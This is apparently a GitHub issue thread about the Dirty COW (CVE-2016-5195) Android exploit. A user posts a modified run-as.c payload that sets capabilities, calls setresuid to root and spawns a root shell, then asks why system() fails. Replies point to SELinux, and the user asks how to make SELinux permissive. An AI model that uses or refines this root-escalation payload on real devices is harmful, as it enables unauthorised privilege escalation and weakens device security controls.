Problem with Run-as

[ghost]

Hello, I've tried to exploit the root access with dirtycow and i've modified the file run-as.c for launching a system command with the function system() but it don't work. Here is the code :

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/capability.h>

int main(int argc, char **argv)
{
  struct __user_cap_header_struct capheader;
  struct __user_cap_data_struct capdata[2];

  memset(&capheader, 0, sizeof(capheader));
  memset(&capdata, 0, sizeof(capdata));
  capheader.version = _LINUX_CAPABILITY_VERSION_3;
  capdata[CAP_TO_INDEX(CAP_SETUID)].effective |= CAP_TO_MASK(CAP_SETUID);
  capdata[CAP_TO_INDEX(CAP_SETGID)].effective |= CAP_TO_MASK(CAP_SETGID);
  capdata[CAP_TO_INDEX(CAP_SETUID)].permitted |= CAP_TO_MASK(CAP_SETUID);
  capdata[CAP_TO_INDEX(CAP_SETGID)].permitted |= CAP_TO_MASK(CAP_SETGID);
  if (capset(&capheader, &capdata[0]) < 0) {
    printf("Could not set capabilities: %s\n", strerror(errno));
  }

  if(setresgid(0,0,0) || setresuid(0,0,0)) {
    printf("setresgid/setresuid failed\n");
  }

  if(getuid() != 0){
    printf("Failed to obtain root access. \n");
    exit(1);
  }
  printf("SUCESSFULL!!\n");
  system("/system/bin/id");
  system("/system/bin/sh");
  return 0;
}

Here is the output:

shell@HWLYO-L6735:/data/local/tmp $ run-as WARNING: linker: run-as: unused DT entry: type 0x6ffffffe arg 0x53c WARNING: linker: run-as: unused DT entry: type 0x6fffffff arg 0x1 SUCESSFULL!!

Do you have an idea ? Thank you in advance for your answer.

[joel0]

SELinux is the problem. run-as is jailed in a way that you can't use system() like that. If you check the return value of the call, I expect you will see some sort of access is denied error.

See https://github.com/timwr/CVE-2016-5195/issues/9 for more discussion on the topic.

[ghost]

How can I put SELinux to permissive ?

[timwr]

See #9